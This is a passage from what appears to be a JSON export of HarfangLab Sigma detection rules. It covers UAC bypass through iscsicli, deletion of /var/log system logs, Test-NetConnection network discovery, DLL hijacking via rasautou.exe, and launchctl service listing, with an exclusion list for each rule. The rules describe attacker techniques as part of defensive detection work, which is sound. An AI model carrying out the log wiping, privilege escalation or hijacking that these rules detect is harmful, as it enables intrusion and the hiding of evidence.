"rule_creation_date": "2022-10-07",
"rule_modified_date": "2025-01-28",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a324bfe0-f0d4-48ff-8121-a6e10932beaf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074371Z",
"creation_date": "2026-03-23T11:45:34.074373Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074377Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blogs.jpcert.or.jp/en/2015/02/a-new-uac-bypass-method-that-dridex-uses.html",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_post_uac_bypass_iscsicli.yml",
"content": "title: UAC Bypass Executed via iscsicli\nid: a324bfe0-f0d4-48ff-8121-a6e10932beaf\ndescription: |\n Detects an unusual process being spawned by iscsicli.exe.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n This UAC bypass method abuses the application compatibility databases to force iscsicli.exe to spawn a privileged process.\n The application compatibility database is a file that configures execution rules for applications that have compatibility issues.\n It is recommended to analyze the process and user session responsible to look for suspicious behavior and to investigate the context in which the parent process was executed to determine legitimacy.\nreferences:\n - https://blogs.jpcert.or.jp/en/2015/02/a-new-uac-bypass-method-that-dridex-uses.html\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2021/01/13\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\iscsicli.exe'\n\n exclusion_conhost:\n Image: '?:\\Windows\\System32\\conhost.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a324bfe0-f0d4-48ff-8121-a6e10932beaf",
"rule_name": "UAC Bypass Executed via iscsicli",
"rule_description": "Detects an unusual process being spawned by iscsicli.exe.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nThis UAC bypass method abuses the application compatibility databases to force iscsicli.exe to spawn a privileged process.\nThe application compatibility database is a file that configures execution rules for applications that have compatibility issues.\nIt is recommended to analyze the process and user session responsible to look for suspicious behavior and to investigate the context in which the parent process was executed to determine legitimacy.\n",
"rule_creation_date": "2021-01-13",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a3b77de5-b326-4b2f-aeed-40cf697ce819",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080659Z",
"creation_date": "2026-03-23T11:45:34.080661Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080665Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md",
"https://attack.mitre.org/techniques/T1070/002/"
],
"name": "t1070_002_system_logs_removed_fs_linux.yml",
"content": "title: System Logs Removed\nid: a3b77de5-b326-4b2f-aeed-40cf697ce819\ndescription: |\n Detects an attempt to remove any of the system's log, located in '/var/log/'.\n Attackers can try to remove the system's logs to hide their tracks.\n It is recommended to go to the machine's timeline and investigate recent actions that an attacker might be trying to hide.\n If this is the result of an installation or log rotation script, it is highly recommended to whitelist the concerned processes.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md\n - https://attack.mitre.org/techniques/T1070/002/\ndate: 2023/01/02\nmodified: 2026/03/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.002\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Deletion\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n Kind:\n - 'remove'\n - 'rename' # In case the file is moved to the thrash bin\n Path:\n - '/var/log/auth.log'\n - '/var/log/apt/history/log'\n - '/var/log/boot'\n - '/var/log/boot.log'\n - '/var/log/cron.log'\n - '/var/log/dmesg'\n - '/var/log/dpkg.log'\n - '/var/log/kern.log'\n - '/var/log/messages'\n - '/var/log/secure'\n - '/var/log/syslog'\n - '/var/log/utmp'\n - '/var/log/wtmp'\n\n # Filter-out the common case where the file gets too big and is suffixed with\n # an incrementing number or is compressed by a log manager.\n filter_rename_old_logs:\n Kind: 'rename'\n Path|startswith: '/var/log/'\n TargetPath|startswith: '/var/log/'\n\n exclusion_common:\n ProcessImage|endswith:\n - '/bin/syslogd'\n - '/bin/syslog-ng'\n - '/bin/metalog'\n - '/bin/rsyslogd'\n - '/sbin/logrotate'\n - '/lib/systemd/systemd'\n - '/lib/systemd/systemd-journald'\n - '/sbin/auditd'\n - '/bin/dmesg'\n\n # Package managers\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n\n exclusion_template_apt:\n - ProcessImage:\n - '/usr/bin/apt'\n - '/usr/bin/apt-get'\n - ProcessParentImage:\n - '/usr/bin/apt'\n - '/usr/bin/apt-get'\n - ProcessGrandparentImage:\n - '/usr/bin/apt'\n - '/usr/bin/apt-get'\n\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n\n exclusion_logstash:\n ProcessImage: '/usr/share/logstash/jdk/bin/java'\n\n exclusion_pmlogger:\n # /bin/sh /usr/lib/pcp/bin/pmlogger_check -C\n # /bin/sh -c /usr/libexec/pcp/bin/pmlogger_check -C\n - ProcessParentCommandLine|startswith:\n - '/bin/sh*/usr/lib/pcp/bin/pmlogger_'\n - '/bin/sh*/usr/libexec/pcp/bin/pmlogger_'\n - '/bin/sh*/usr/lib/pcp/bin/pmie_' # (pmie_check, pmie_daily)\n - '/bin/sh*/usr/libexec/pcp/bin/pmie_' # (pmie_check, pmie_daily)\n - ProcessGrandparentCommandLine|startswith:\n - '/bin/sh*/usr/lib/pcp/bin/pmlogger_'\n - '/bin/sh*/usr/libexec/pcp/bin/pmlogger_'\n - '/usr/sbin/crond '\n\n exclusion_docker:\n ProcessImage:\n - '/usr/local/bin/dockerd'\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_kaniko:\n ProcessImage|endswith: '/kaniko/executor'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\n#level: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a3b77de5-b326-4b2f-aeed-40cf697ce819",
"rule_name": "System Logs Removed",
"rule_description": "Detects an attempt to remove any of the system's log, located in '/var/log/'.\nAttackers can try to remove the system's logs to hide their tracks.\nIt is recommended to go to the machine's timeline and investigate recent actions that an attacker might be trying to hide.\nIf this is the result of an installation or log rotation script, it is highly recommended to whitelist the concerned processes.\n",
"rule_creation_date": "2023-01-02",
"rule_modified_date": "2026-03-13",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a3c7686b-301b-438b-a523-df78d8a15b1b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622516Z",
"creation_date": "2026-03-23T11:45:34.622518Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622522Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://www.sans.org/blog/pen-test-poster-white-board-powershell-built-in-port-scanner/",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_powershell_test_netconnection.yml",
"content": "title: Test-NetConnection Cmdlet Executed via PowerShell\nid: a3c7686b-301b-438b-a523-df78d8a15b1b\ndescription: |\n Detects the usage of the Test-NetConnection PowerShell cmdlet.\n Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement.\n It is recommended to check the process activity for other suspicious PowerShell commands execution.\nreferences:\n - https://www.sans.org/blog/pen-test-poster-white-board-powershell-built-in-port-scanner/\n - https://attack.mitre.org/techniques/T1018/\ndate: 2022/11/08\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n PowershellCommand|contains:\n - 'Test-NetConnection -Comp'\n - 'Test-Connection -Comp'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_path:\n PowershellScriptPath|contains: '\\'\n\n exclusion_wsmprovhost:\n ProcessOriginalFileName: 'wsmprovhost.exe'\n\n exclusion_sense_IR:\n - ProcessParentImage|endswith: 'senseir.exe'\n - ProcessGrandparentImage|endswith: 'senseir.exe'\n\n exclusion_cyberwatch:\n ProcessParentImage|endswith: 'cyberwatch-agent.exe'\n\n exclusion_citrix:\n PowershellScriptPath|endswith: '\\CITRIX_Check_user.ps1'\n\n exclusion_cairnis:\n PowershellScriptPath: '?:\\CairnisAgent\\CAIDB\\WS\\CAIPWS_Command.ps1'\n ProcessGrandparentImage: '?:\\Program Files (x86)\\CairnisAgent\\nvdkit.exe'\n\n exclusion_rgsystem:\n ProcessParentImage: '?:\\Program Files (x86)\\RG-Supervision\\RG_Supervision.exe'\n ProcessGrandparentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_gehealthcare:\n PowershellScriptPath:\n - '?:\\Program Files\\GE Healthcare\\Solution Deployer Framework\\Modules\\Utility\\Networking.ps1'\n - '?:\\Program Files (x86)\\GE Healthcare\\Solution Deployer Framework\\Modules\\Utility\\Networking.ps1'\n - '?:\\Program Files\\GE Healthcare\\Solution Deployer Framework\\Modules\\Utility\\Connectivity.ps1'\n - '?:\\Program Files (x86)\\GE Healthcare\\Solution Deployer Framework\\Modules\\Utility\\Connectivity.ps1'\n\n # https://learn.microsoft.com/en-us/troubleshoot/windows-client/windows-troubleshooters/introduction-to-troubleshootingscript-toolset-tssv2\n exclusion_tssv2:\n PowershellCommand|contains:\n - '$checkConn = FwTest-TCPport -ComputerName $WebSite -Port 80 -Timeout 900'\n - 'Test-NetConnection -ComputerName $TLStestSite -CommonTCPPort HTTP).TcpTestSucceeded)) { #ToDo: verify - failed on NPS server'\n - '$pubsymsrvcon = Test-NetConnection -ComputerName $PublicSymSrv -CommonTCPPort HTTP -ErrorAction SilentlyContinue -WarningAction SilentlyContinue'\n PowershellScriptPath|endswith:\n - '\\TSSv2.ps1'\n - '\\TSSv2_ADS.psm1'\n - '\\TSSv2_DND.psm1'\n - '\\TSSv2_NET.psm1'\n\n exclusion_NinjaRMMAgent:\n ProcessParentCommandLine: 'cmd.exe /c ?:\\ProgramData\\NinjaRMMAgent\\scripting\\\\*'\n ProcessGrandparentImage|endswith: '\\NinjaRMMAgent.exe'\n\n exclusion_sapien:\n PowershellScriptPath: '?:\\Program Files\\SAPIEN Technologies, Inc\\PowerShell Studio 2022\\Debugger64\\ScriptDriver64.exe'\n\n #exclusion_serviceportalagent:\n # PowershellCommand|contains|all:\n # - 'function Test-WindowsUpdateConnectivity {'\n # - 'Uses Test-NetConnection and Invoke-WebRequest to decide if a device has connectivity to Windows Up'\n # - '$Tcp = Test-NetConnection -ComputerName $TcpUri -Port $Port'\n\n exclusion_open_nebula:\n - ProcessParentImage:\n - '?:\\Program Files (x86)\\OpenNebula\\rhsrvany.exe'\n - '?:\\Program Files\\OpenNebula\\rhsrvany.exe'\n - ProcessGrandparentImage:\n - '?:\\Program Files (x86)\\OpenNebula\\rhsrvany.exe'\n - '?:\\Program Files\\OpenNebula\\rhsrvany.exe'\n\n exclusion_icinga:\n PowershellCommand|contains|all:\n - 'Test-IcingaICMPConnection -Hostname '\n - 'Get-IcingaValue -Value $ICMP.ResponseTime -Compare $MinResponseTime -Minimum;'\n - 'have SANs; continue with next ExcludeString in the array'\n\n exclusion_intune:\n # C:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe\n ProcessParentOriginalFileName: 'AgentExecutor.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n\n exclusion_serviceportalagent:\n ProcessOriginalFileName: 'MmrAgent.NetFxEmulator.exe'\n ProcessSigned: 'true'\n ProcessSignature: \"Microsoft Corporation\"\n\n exclusion_prtg:\n ProcessImage: '?:\\Program Files (x86)\\PRTG Network Monitor\\PowerShellScriptRunner.exe'\n\n exclusion_programfiles:\n - ProcessImage|startswith:\n - '?:\\program files\\'\n - '?:\\program files (x86)\\'\n - ProcessParentImage|startswith:\n - '?:\\program files\\'\n - '?:\\program files (x86)\\'\n - ProcessGrandparentImage|startswith:\n - '?:\\program files\\'\n - '?:\\program files (x86)\\'\n\n exclusion_servicenav:\n ProcessCommandLine|contains: '/scripts-servicenav/'\n\n exclusion_rudder:\n ProcessCommandLine|contains: '?:\\Program Files\\Rudder/bin/rudder.ps1 agent run'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe|'\n - '|?:\\Program Files (x86)\\Microsoft Configuration Manager\\AdminConsole\\bin\\Microsoft.ConfigurationManagement.exe'\n\n exclusion_explorer:\n ProcessParentImage: '?:\\WINDOWS\\Explorer.EXE'\n\n exclusion_omsassessment:\n ProcessOriginalFileName: 'OmsAssessment.exe'\n ProcessSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n\n exclusion_winrm:\n ProcessAncestors|contains:\n - '|?:\\Windows\\System32\\winrshost.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|'\n - '|?:\\Windows\\System32\\wsmprovhost.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a3c7686b-301b-438b-a523-df78d8a15b1b",
"rule_name": "Test-NetConnection Cmdlet Executed via PowerShell",
"rule_description": "Detects the usage of the Test-NetConnection PowerShell cmdlet.\nAdversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement.\nIt is recommended to check the process activity for other suspicious PowerShell commands execution.\n",
"rule_creation_date": "2022-11-08",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a3fc0e1e-cea6-465f-92f2-df8319888e07",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089827Z",
"creation_date": "2026-03-23T11:45:34.089829Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089833Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rasautou.yml",
"content": "title: DLL Hijacking via rasautou.exe\nid: a3fc0e1e-cea6-465f-92f2-df8319888e07\ndescription: |\n Detects potential Windows DLL Hijacking via rasautou.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rasautou.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\MPRAPI.dll'\n - '\\rasdlg.dll'\n - '\\rasman.dll'\n - '\\rtutils.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a3fc0e1e-cea6-465f-92f2-df8319888e07",
"rule_name": "DLL Hijacking via rasautou.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rasautou.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a41b4e95-63d6-4018-bcbe-eb7cd37af7d5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617947Z",
"creation_date": "2026-03-23T11:45:34.617949Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617953Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1007/",
"https://attack.mitre.org/techniques/T1569/001/"
],
"name": "t1007_launchctl_list.yml",
"content": "title: System Services Discovered via Launchctl\nid: a41b4e95-63d6-4018-bcbe-eb7cd37af7d5\ndescription: |\n Detects the usage of launchctl to list the installed launch daemons/agents.\n An attacker could list the installed launch daemons/agents to look for vulnerable daemons, or list defensive tools installed on the infected host.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1007/\n - https://attack.mitre.org/techniques/T1569/001/\ndate: 2022/11/09\nmodified: 2025/10/13\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1007\n - attack.t1569.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Launchctl\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/bin/launchctl'\n CommandLine:\n - 'launchctl list'\n - '/bin/launchctl list'\n # Filter-out missing parents\n ParentImage|contains: '?'\n GrandparentImage|contains: '?'\n\n exclusion_parentimage:\n ParentImage:\n - '/usr/bin/sysdiagnose'\n - '/usr/libexec/sysdiagnosed'\n - '/usr/local/bin/ctrld'\n - '/Applications/*.app/Contents/*'\n - '/Applications/GLPI-Agent/bin/perl'\n - '/Applications/NinjaRMMAgent/programfiles/ninjarmm-macagent'\n - '/Applications/NinjaRemote/ncstreamer.app/Contents/MacOS/ncstreamer'\n - '/Library/Application Support/*'\n - '/Library/Bitdefender/AVP/product/bin/BDUpgDaemon'\n - '/Library/WithSecure/bin/wsswupd.xpc/Contents/MacOS/wsswupd'\n - '/Users/*/Visual Studio Code.app/Contents/Resources/app/bin/code-tunnel'\n - '/Users/*/Applications/zoom.us.app/Contents/Library/LaunchAgents/ZoomUpdater.app/Contents/MacOS/ZoomUpdater'\n - '/private/var/folders/*/Visual Studio Code*.app/Contents/Resources/app/bin/code-tunnel'\n - '/opt/fusioninventory-agent/bin/perl'\n - '/opt/homebrew/Library/Homebrew/vendor/portable-ruby/*/bin/ruby'\n - '/usr/local/Homebrew/Library/Homebrew/vendor/portable-ruby/*/bin/ruby'\n - '/usr/local/munki/Python.framework/Versions/*/Resources/Python.app/Contents/MacOS/Python'\n\n exclusion_grandparentimage:\n GrandparentImage:\n - '/Applications/*.app/Contents/*'\n - '/Applications/GLPI-Agent/bin/perl'\n - '/Applications/NinjaRMMAgent/programfiles/ninjarmm-macagent'\n - '/Applications/Utilities/Adobe Creative Cloud/Utils/AdobeGenuineValidator'\n - '/Applications/GLPI-Agent/bin/perl /Applications/GLPI-Agent/bin/glpi-agent'\n - '/Library/Application Support/*'\n - '/Library/ManageEngine/UEMS_Agent/bin/dcpatchscan'\n - '/opt/homebrew/Library/Homebrew/vendor/portable-ruby/*/bin/ruby'\n - '/usr/local/Homebrew/Library/Homebrew/vendor/portable-ruby/*/bin/ruby'\n - '/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices/package_script_service.xpc/Contents/MacOS/package_script_service'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|/Applications/*.app/Contents/'\n - '|/Applications/Utilities/Adobe Creative Cloud/Utils/AdobeGenuineValidator|'\n\n exclusion_installer:\n GrandparentCommandLine|startswith:\n - '/bin/bash /tmp/PKInstallSandbox'\n - '/bin/bash /Library/InstallerSandboxes/'\n - '/bin/sh /tmp/PKInstallSandbox.??????/Scripts/'\n - '/bin/zsh /tmp/PKInstallSandbox.??????/Scripts/'\n - '/bin/bash -x /tmp/PKInstallSandbox.??????/Scripts/'\n\n exclusion_logi:\n CommandLine|startswith: '/bin/launchctl list com.logi.optionsplus.updater'\n\n exclusion_avast:\n CommandLine: '/bin/launchctl list com.avast.service'\n GrandparentCommandLine: '/bin/bash /Applications/Avast.app/Contents/Backend/scripts/update/update.sh'\n\n exclusion_globalprotect:\n GrandparentCommandLine:\n - 'sh -c sudo /bin/launchctl list | /usr/bin/grep palo | /usr/bin/grep -v grep >> /Library/Logs/PaloAltoNetworks/GlobalProtect/sysext.service.log'\n - 'sh -c sudo /bin/launchctl list | /usr/bin/grep NetworkExtension.com.paloaltonetworks.GlobalProtect.client.extension > /dev/null 2>&1'\n\n exclusion_wazuh:\n Ancestors|contains: '/Library/Ossec/bin/wazuh-syscheckd'\n\n exclusion_amazon:\n ParentCommandLine: '/bin/bash /usr/local/libexec/amazon-ena-ethernet'\n\n exclusion_ardagent:\n ProcessGrandparentCommandLine|contains: '/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart'\n\n exclusion_jamf:\n - ProcessAncestors|contains: '/usr/local/jamf/bin/jamf'\n - ProcessParentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n exclusion_sekoia:\n ProcessParentImage: '/sbin/launchd'\n ProcessCommandLine: 'launchctl list SEKOIAEndpointAgentWatchdog'\n\n exclusion_mcafee:\n ProcessCommandLine: 'sh -c launchctl list | grep com.mcafee.virusscan.fmpcd'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a41b4e95-63d6-4018-bcbe-eb7cd37af7d5",
"rule_name": "System Services Discovered via Launchctl",
